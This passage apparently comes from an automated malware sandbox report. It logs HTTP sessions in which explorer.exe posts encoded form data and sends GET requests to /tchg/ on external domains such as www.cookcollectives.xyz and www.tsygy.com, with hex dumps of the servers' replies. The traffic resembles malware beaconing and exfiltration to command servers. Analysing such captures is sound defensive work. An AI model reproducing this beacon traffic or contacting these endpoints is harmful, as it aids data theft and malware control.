                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 77 5a 70 44 62 4c 57 31 62 64 51 48 31 4d 70 4a 55 4e 56 79 46 41 56 6b 59 56 62 64 49 67 65 4c 43 33 56 34 4e 68 46 6b 72 36 36 42 76 52 56 55 67 63 42 67 52 4e 6d 7a 70 6b 79 7a 49 5f 47 57 4a 38 66 4a 55 36 48 4d 4a 41 35 7a 32 4a 6d 46 77 72 4b 5a 31 73 42 5f 63 51 68 2d 4c 49 4b 33 6c 35 79 2d 41 35 43 67 7a 55 71 5f 56 54 6a 53 6e 30 28 51 39 6e 64 4e 50 6f 6c 30 59 67 78 52 74 66 65 50 44 50 62 35 31 46 49 4e 56 36 72 7a 58 4d 41 43 56 33 6c 55 78 68 6b 47 52 72 56 55 37 67 6b 59 36 51 7a 44 6d 5f 51 71 76 51 5a 70 30 6c 48 58 69 49 6d 72 4f 53 6a 64 53 66 57 54 4b 51 46 70 36 62 6e 2d 28 61 49 78 4c 6f 65 6a 35 42 75 4a 68 4a 56 49 6c 46 70 4b 37 50 6f 4a 4a 33 55 41 76 32 6f 5a 71 4b 41 56 4b 31 5a 2d 52 74 46 58 6c 6d 28 4a 37 53 71 55 4c 32 35 50 38 48 41 53 70 43 51 66 31 66 67 66 37 73 38 41 74 57 4c 59 71 41 59 39 45 64 66 51 4a 6c 59 4a 6c 51 67 79 4c 74 68 59 72 4a 75 4a 68 72 6c 6d 71 46 70 66 30 58 49 64 6b 57 65 54 42 56 32 7a 45 53 6a 34 37 6f 59 68 72 45 5a 67 37 79 59 65 51 69 33 50 39 39 7e 73 33 4d 63 31 63 6f 43 76 79 4a 69 73 39 2d 44 6e 4f 43 69 41 31 34 55 69 51 57 62 55 76 4c 49 33 7e 64 5a 4e 7e 30 56 72 38 75 6e 43 47 31 78 49 75 68 35 56 65 6b 7a 54 64 69 73 78 56 48 75 42 53 2d 74 4d 78 30 4a 66 35 6f 79 6c 63 53 41 76 45 50 69 72 50 50 28 6e 4c 6b 6d 7a 72 4e 61 50 73 6b 4a 76 52 50 46 63 4a 61 56 38 6f 65 69 5f 6b 32 44 6f 4c 7a 51 38 4b 64 6b 75 67 41 65 58 50 45 37 64 6e 58 4b 47 39 36 59 68 6d 58 50 54 6e 54 63 53 7e 65 5a 48 74 54 34 51 68 2d 63 32 61 56 4e 47 6e 66 4a 50 4d 5a 49 56 72 59 4e 43 47 50 65 6e 33 62 69 6f 35 76 35 73 28 45 6f 31 58 6f 59 7a 79 67 35 6f 4b 49 28 4c 6d 4f 6d 6d 6b 76 38 61 6f 76 39 56 46 64 4b 42 33 64 58 41 74 4c 75 58 71 74 56 43 58 4d 56 34 38 33 67 55 32 62 32 41 48 7a 4d 4d 52 38 70 55 66 64 72 33 7e 32 61 70 64 58 32 6c 72 4d 58 74 62 35 76 76 59 65 34 30 41 55 4d 39 51 71 32 72 75 61 31 65 73 57 6e 4c 58 44 74 32 31 46 56 51 67 44 6f 44 4c 53 32 33 47 59 38 72 6e 55 36 39 47 4d 54 53 6a 36 6f 63 57 70 49 58 61 75 65 69 70 4c 50 63 31 69 79 6f 55 62 6d 6a 36 6a 58 37 31 72 75 59 55 36 7e 78 7a 31 6c 61 68 57 4b 42 30 58 61 61 51 47 6a 75 6e 34 7a 74 32 72 6d 43 28 6d 62 4b 4a 37 75 66 69 6a 56 72 5a 55 6b 63 4f 6d 4d 5a 66 74 57 46 6e 68 32 4d 52 51 44 58 28 39 4b 77 6c 69 6d 4d 64 67 43 52 6b 6f 46 69 4b 67 38 55 34 59 57 58 74 66 41 33 49 5a 37 4c 46 66 77 46 4f 78 51 46 71 6e 58 66 64 64 63 59 34 57 38 44 53 34 77 32 50 6b 64 32 31 45 46 6f 46 53 47 35 4a 73 54 69 49 62 6a 38 77 41 35 68 4c 79 5a 58 6c 31 42 68 43 33 56 4c 30 58 64 54 46 61 63 6d 39 56 33 63 63 78 33 33 34 70 69 6e 28 44 54 79 32 53 62 45 6c 33 70 55 33 39 33 61 4a 4d 43 50 6f 6a 52 65 6c 55 53
                                                                                                                    Data Ascii: O0qEM=wZpDbLW1bdQH1MpJUNVyFAVkYVbdIgeLC3V4NhFkr66BvRVUgcBgRNmzpkyzI_GWJ8fJU6HMJA5z2JmFwrKZ1sB_cQh-LIK3l5y-A5CgzUq_VTjSn0(Q9ndNPol0YgxRtfePDPb51FINV6rzXMACV3lUxhkGRrVU7gkY6QzDm_QqvQZp0lHXiImrOSjdSfWTKQFp6bn-(aIxLoej5BuJhJVIlFpK7PoJJ3UAv2oZqKAVK1Z-RtFXlm(J7SqUL25P8HASpCQf1fgf7s8AtWLYqAY9EdfQJlYJlQgyLthYrJuJhrlmqFpf0XIdkWeTBV2zESj47oYhrEZg7yYeQi3P99~s3Mc1coCvyJis9-DnOCiA14UiQWbUvLI3~dZN~0Vr8unCG1xIuh5VekzTdisxVHuBS-tMx0Jf5oylcSAvEPirPP(nLkmzrNaPskJvRPFcJaV8oei_k2DoLzQ8KdkugAeXPE7dnXKG96YhmXPTnTcS~eZHtT4Qh-c2aVNGnfJPMZIVrYNCGPen3bio5v5s(Eo1XoYzyg5oKI(LmOmmkv8aov9VFdKB3dXAtLuXqtVCXMV483gU2b2AHzMMR8pUfdr3~2apdX2lrMXtb5vvYe40AUM9Qq2rua1esWnLXDt21FVQgDoDLS23GY8rnU69GMTSj6ocWpIXaueipLPc1iyoUbmj6jX71ruYU6~xz1lahWKB0XaaQGjun4zt2rmC(mbKJ7ufijVrZUkcOmMZftWFnh2MRQDX(9KwlimMdgCRkoFiKg8U4YWXtfA3IZ7LFfwFOxQFqnXfddcY4W8DS4w2Pkd21EFoFSG5JsTiIbj8wA5hLyZXl1BhC3VL0XdTFacm9V3ccx334pin(DTy2SbEl3pU393aJMCPojRelUS
                                                                                                                    May 30, 2023 11:12:09.991266966 CEST1418OUTData Raw: 4e 63 77 54 5f 74 33 44 42 78 76 4d 62 31 43 53 49 51 4e 70 72 48 4e 7a 6d 65 72 4f 5a 38 5a 4a 2d 4a 61 73 79 78 64 31 42 32 30 58 71 66 6c 53 48 72 57 4d 41 4a 56 73 78 70 74 4c 6e 58 58 58 63 34 59 76 61 4c 52 72 77 62 30 54 54 79 53 56 55 52
                                                                                                                    Data Ascii: NcwT_t3DBxvMb1CSIQNprHNzmerOZ8ZJ-Jasyxd1B20XqflSHrWMAJVsxptLnXXXc4YvaLRrwb0TTySVUR_zne0J3j8Kf4RS_ZmgHelHMaxZZK3s9zNy187RtOR94fKt1xywLUsbusB4gQbKSdfMFG0Qg26iipotITe6oS-UtNSaE1Ni4KBzGImCrZ0koI-lPt-osuQY4n7HTZSpnO5JG(jqP2uX_wPsfwM4gEJw5BP4reOvEwL
                                                                                                                    May 30, 2023 11:12:09.991312981 CEST1419OUTData Raw: 36 6a 6f 6a 73 52 61 77 43 65 46 70 36 7e 71 45 6a 4d 71 42 72 70 33 4f 6f 47 76 69 7a 7a 69 6f 78 5a 53 32 6e 52 4d 58 6c 59 53 65 58 32 65 41 76 6d 38 5a 63 72 32 42 41 53 76 34 50 6e 44 36 71 45 47 6a 2d 49 4b 28 4c 7e 7a 69 64 6b 73 4d 78 6b
                                                                                                                    Data Ascii: 6jojsRawCeFp6~qEjMqBrp3OoGvizzioxZS2nRMXlYSeX2eAvm8Zcr2BASv4PnD6qEGj-IK(L~zidksMxkEJMFiBwWRcJYOLrKfQ4x6w92MxUoDDtkKzzghGsafyOB-gDIA1Ds9Y5wobp9zvY4m34GAGPZGdKYDYWLCV1i_7rhYmrYBpBbdqRJ9zoTMZ0a_WtjymLRKVvfPCOUdRlxEb8ZUPX1damFWag5CbmG8RT23Mt8TU9(3
                                                                                                                    May 30, 2023 11:12:10.158207893 CEST1423OUTData Raw: 69 57 69 35 5a 42 73 6d 46 43 70 63 34 42 70 45 4c 55 59 5a 48 6e 54 77 45 54 4f 4f 72 43 78 55 57 6e 55 64 62 69 54 72 6b 64 4a 65 39 4f 64 66 53 39 46 38 4f 67 61 28 6e 64 6e 33 6f 33 69 33 74 62 2d 63 51 51 2d 36 6e 73 55 71 6e 6d 44 51 64 67
                                                                                                                    Data Ascii: iWi5ZBsmFCpc4BpELUYZHnTwETOOrCxUWnUdbiTrkdJe9OdfS9F8Oga(ndn3o3i3tb-cQQ-6nsUqnmDQdgN2rbw~gLXZVJ8dd7_DQkN2INJIwgs6eO9jO3xdPgW7xDtIrEfbaTfHfL10P~iY99XIKJy6i9rK1n-FCuQ9VwA6_8zS7UvEFgK5yVI8DJUCQSwN_HoVuX_vnHH2I(ixGWZqxJp5cC6ji5Lez97Ecr_8gI2oVZaOL2C
                                                                                                                    May 30, 2023 11:12:10.158288956 CEST1433OUTData Raw: 52 59 49 44 58 46 65 55 6d 78 4c 57 6b 35 35 65 53 4b 73 39 38 54 70 78 57 64 61 74 34 72 4f 69 43 53 36 61 2d 79 42 6c 6d 78 68 45 44 51 56 63 7a 6e 47 35 4a 58 36 46 46 44 30 4b 59 4b 30 34 66 30 51 32 79 54 65 61 78 53 31 6c 68 35 31 56 48 44
                                                                                                                    Data Ascii: RYIDXFeUmxLWk55eSKs98TpxWdat4rOiCS6a-yBlmxhEDQVcznG5JX6FFD0KYK04f0Q2yTeaxS1lh51VHDczyHFEOpA13cieBEA7vCsh5PctUwJzjkszFgikXexgBZ17RLgSj6qWWd0l6(eZLU18aeup5viNEpkrMP-F71voaXg0aNxEACoR8DFZ4hIRXfPjuXOoBYzboC51MgBbNUU1R1ZYwWIWGh4EtDM(Stmc0hgJ2G6CjTJ
                                                                                                                    May 30, 2023 11:12:10.158363104 CEST1440OUTData Raw: 61 46 44 79 72 63 45 38 4d 67 46 35 71 7a 4b 6b 6b 62 63 34 70 36 4f 55 42 54 34 59 68 31 4a 36 6e 77 78 48 58 62 5f 77 53 5a 43 72 63 46 5a 28 4d 67 62 28 50 69 50 36 6c 58 57 6a 67 47 50 4c 67 4e 49 53 32 69 31 4a 39 72 6e 4b 66 6c 73 42 76 6f
                                                                                                                    Data Ascii: aFDyrcE8MgF5qzKkkbc4p6OUBT4Yh1J6nwxHXb_wSZCrcFZ(Mgb(PiP6lXWjgGPLgNIS2i1J9rnKflsBvoJ0BIi3Ss8ZE0S73PSBVq7Up8sKnC3A7l2jiwvOPSmTH5RcOHCgUNwkdjlKwSMcyu9SL~lGNi4brnBxo(M7kZlAeb4bJeQUERYY_HHLzrAPa(qRSU7ZUNxz9tju2FF0pEEx86-r2glY7mDF22683Bt~XozN1WVvCH2
                                                                                                                    May 30, 2023 11:12:10.158927917 CEST1440INHTTP/1.1 200 OK
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                    X-Powered-By: Nginx
                                                                                                                    Date: Tue, 30 May 2023 09:12:06 GMT
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                                                                    Data Ascii: a
                                                                                                                    May 30, 2023 11:12:10.159219980 CEST1441INData Raw: 32 61 66 0d 0a c5 55 3f 73 d3 30 14 ff 2a c6 3d 48 7b d7 c4 92 25 39 96 9d 78 29 cc 30 74 61 74 6d 25 11 75 2c 63 2b 75 d2 91 8d a1 ac 2c 4c b0 74 68 cb c0 50 0e 8e eb 97 81 36 4c 7c 05 24 d9 40 da 2b 3d b8 eb 5d 3d f8 67 e9 fd fb e9 bd a7 e7 1f
                                                                                                                    Data Ascii: 2afU?s0*=H{%9x)0tatm%u,c+u,LthP6L|$@+=]=g>~5,5fy5'RuQOcRJ*h X`BFEU\z05zCO(1)op2@KI?8)lQ2l+dwMKSV%%/$%E?jd
                                                                                                                    May 30, 2023 11:12:10.159276962 CEST1441INData Raw: 38 0d 0a ee 6a 61 23 a4 06 00 00 0d 0a
                                                                                                                    Data Ascii: 8ja#
                                                                                                                    May 30, 2023 11:12:10.159333944 CEST1441INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0
                                                                                                                    May 30, 2023 11:12:10.325177908 CEST1444OUTData Raw: 6c 4b 4a 48 2d 30 50 43 6d 6f 44 53 6a 63 72 7a 48 6f 6e 57 4f 56 79 44 58 66 39 49 79 70 4c 7e 36 6e 65 4f 76 42 46 61 4a 33 79 28 55 69 65 78 64 7a 69 54 79 6c 58 6f 63 67 5a 78 30 72 30 6f 67 4f 6f 6a 77 71 46 30 36 56 63 67 2d 44 72 49 4e 50
                                                                                                                    Data Ascii: lKJH-0PCmoDSjcrzHonWOVyDXf9IypL~6neOvBFaJ3y(UiexdziTylXocgZx0r0ogOojwqF06Vcg-DrINPt0gjJs58Kb8QnJ0G4clORaWfoCBcYF6EIXHWN(PP8v9PrR1(4Fl2OAML2R2UYFWkMneHbTgJweby37zMkucgEkbbxW9r-fcPTrMAkCiJ4A2tfgFAgNzvkTZdtOnu9wC9MPqlfu-l3tlJyIKohL_JZfX7Yoyv_JRv7
                                                                                                                    May 30, 2023 11:12:10.325268984 CEST1449OUTData Raw: 2d 61 75 6e 30 54 6a 76 79 47 39 4a 53 6d 4c 68 63 34 4f 77 36 37 31 28 35 32 6b 64 48 64 6f 65 6d 4d 35 36 32 41 6c 53 37 67 50 4a 39 50 79 46 66 69 31 58 42 38 57 69 44 32 4a 76 54 6d 69 6c 53 48 59 50 45 7a 32 79 49 62 32 6c 74 36 65 75 66 57
                                                                                                                    Data Ascii: -aun0TjvyG9JSmLhc4Ow671(52kdHdoemM562AlS7gPJ9PyFfi1XB8WiD2JvTmilSHYPEz2yIb2lt6eufWBp4XyhlGDVIPZJjhJl_MmIsfQZ-14n-fo9lwted9-eA2EzdH5wKDsgrz2sy9cqmteYJnBuyVc2AUk6JqBhg8i6CRp57v45ofXXJdviymKHO42L3J8IJ(Cp3FHJIrQhr797Q38Uz~ANQi3W4fTinl43Xp-ynLYKLe3
                                                                                                                    May 30, 2023 11:12:10.325324059 CEST1454OUTData Raw: 36 58 39 78 74 6a 55 50 77 55 65 6d 53 39 52 64 4a 46 74 69 53 53 63 77 5a 7a 36 52 57 76 45 59 46 62 46 49 57 73 76 38 35 36 33 41 39 52 51 6c 4a 54 77 37 31 61 74 69 55 48 77 4e 38 35 66 67 64 77 31 69 58 69 44 54 50 72 73 58 50 35 6d 34 75 4c
                                                                                                                    Data Ascii: 6X9xtjUPwUemS9RdJFtiSScwZz6RWvEYFbFIWsv8563A9RQlJTw71atiUHwN85fgdw1iXiDTPrsXP5m4uL2sZS8EuPVR88VbzYvMO5hqs~TapYzebKxHUUbdx7BLhdynGOJyho5oFLLwoiXu12SXSudjUNyl83z8CMReQFxL8twvyX1gUNbOga_p4FVAs7CAcu8y1C3T66O66NO7ua3Htjkq153d0bMVSH1VnO3CrxbjJ3xmqdJ
                                                                                                                    May 30, 2023 11:12:10.325496912 CEST1459OUTData Raw: 78 34 63 4b 33 72 48 70 4b 42 67 56 31 57 51 52 69 39 55 47 54 62 36 39 63 66 45 42 66 6a 7a 54 37 71 34 72 59 6a 79 73 33 42 31 28 33 57 4e 6a 69 4e 41 4b 62 75 38 44 47 76 65 28 6c 6a 35 4c 4a 53 49 4e 54 45 50 54 6d 6e 77 32 44 34 62 45 52 35
                                                                                                                    Data Ascii: x4cK3rHpKBgV1WQRi9UGTb69cfEBfjzT7q4rYjys3B1(3WNjiNAKbu8DGve(lj5LJSINTEPTmnw2D4bER5woXC089AJLGNx3BWHqS477H~2E_Q6PuGbOUaS7-O7lxsXidW7CT3hrMqXtEYTWbMi0SL_WBVoNKugDMGX~VoEaFhrBQO5nxIlPJGTU6HiCKTIM7BnJv4Q5TPHJAiIiHX608i_ePCF5RPdy2Y1VA2ZfeBD7gKnE7Q8
                                                                                                                    May 30, 2023 11:12:10.325664043 CEST1460OUTData Raw: 44 71 69 64 30 50 37 28 54 44 72 31 4e 6f 77 7e 64 4c 77 32 49 6c 4b 70 46 73 55 68 56 37 37 69 46 34 52 71 30 28 43 33 37 57 65 43 4b 72 55 73 4e 34 47 51 62 46 4c 42 50 46 37 7a 75 77 4a 54 4c 66 44 6c 32 71 33 74 4f 43 5a 32 34 43 61 38 4d 50
                                                                                                                    Data Ascii: Dqid0P7(TDr1Now~dLw2IlKpFsUhV77iF4Rq0(C37WeCKrUsN4GQbFLBPF7zuwJTLfDl2q3tOCZ24Ca8MPBkIjUIerxPC~wThZVodDOg6Dp3LB11emRq1cJ3p8llhLdyopyc37AT_vPDOKDASDtGrEtHHIqkCXfYypXQ4~oivpt(-C5fSrJQyZnz_aExl2BdLbSH1l4C9r_0k2L(0SC4QoUimtCiLZy~siv1wSENsmI48S_1_xz


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    75192.168.11.204983423.104.137.18580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:12.677489996 CEST1466OUTGET /tchg/?O0qEM=9bBjY/6oTKgH1shIYNMDEgJDdV7IeHSSKUh5InR8itKuthEKpcsrZfSerFOqB7XzWJrnUJabB2R375fix7bupMFfJVFvNpSnug==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.tsygy.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:12:12.844702005 CEST1466INHTTP/1.1 200 OK
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                    X-Powered-By: Nginx
                                                                                                                    Date: Tue, 30 May 2023 09:12:09 GMT
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                                    Data Ascii: 3
                                                                                                                    May 30, 2023 11:12:12.844796896 CEST1468INData Raw: 36 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 26 23 32 30 30 36
                                                                                                                    Data Ascii: 6a1<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>&#20061;&#28216;&#20250;&#22312;&#32447;&#23448;&#26041;&#32593;&#31449;&#95;&#20061;&#28216;&#20250;&#23448;&#32593;&#106;&#57;</title><meta name="keywords" content="
                                                                                                                    May 30, 2023 11:12:12.844855070 CEST1468INData Raw: 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 39 39 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 30
                                                                                                                    Data Ascii: top:0;left:0;width:100%;height:100%;background:#fff;z-index: 999999;padding-top:200px;font-size:20px;text-align:center;color:#000'>,&#20061;&#28216;&#20250;&#22312;&#32447;&#23448;&#26041;&#32593;&#31449;&#95;&#20061;&#28216;&#2025
                                                                                                                    May 30, 2023 11:12:12.844913006 CEST1468INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    76192.168.11.2049835199.192.30.14780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:18.024607897 CEST1469OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.cookcollectives.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.cookcollectives.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.cookcollectives.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 79 30 4c 79 67 70 65 74 4c 4e 4c 62 4c 64 67 78 30 47 71 4e 4b 69 65 67 61 35 43 52 53 57 63 41 76 34 31 51 6c 5a 66 63 53 2d 71 4b 4c 78 6b 6e 78 5a 35 68 54 59 65 69 32 4c 70 35 49 76 46 6b 37 68 4f 6b 46 68 76 70 76 6b 70 77 79 32 76 68 74 71 66 4f 4e 65 36 64 71 76 44 78 4f 52 7e 4c 75 2d 6a 34 77 66 30 58 42 41 38 2d 45 65 41 69 30 6a 62 4d 56 73 56 35 6d 36 35 72 6d 39 6f 61 77 48 41 50 61 77 4b 50 6a 50 39 58 65 57 4a 7a 62 4c 75 39 33 47 64 61 65 33 46 37 53 53 69 62 6c 4a 62 33 5a 58 34 65 54 41 4f 56 77 4c 77 30 41 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=y0LygpetLNLbLdgx0GqNKiega5CRSWcAv41QlZfcS-qKLxknxZ5hTYei2Lp5IvFk7hOkFhvpvkpwy2vhtqfONe6dqvDxOR~Lu-j4wf0XBA8-EeAi0jbMVsV5m65rm9oawHAPawKPjP9XeWJzbLu93Gdae3F7SSiblJb3ZX4eTAOVwLw0AQ).
                                                                                                                    May 30, 2023 11:12:18.313868046 CEST1471INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 30 May 2023 09:12:18 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4406
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>...<![endif]-
                                                                                                                    May 30, 2023 11:12:18.313889980 CEST1472INData Raw: 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22
                                                                                                                    Data Ascii: ->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleap
                                                                                                                    May 30, 2023 11:12:18.313919067 CEST1473INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22
                                                                                                                    Data Ascii: <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <li><a href="con
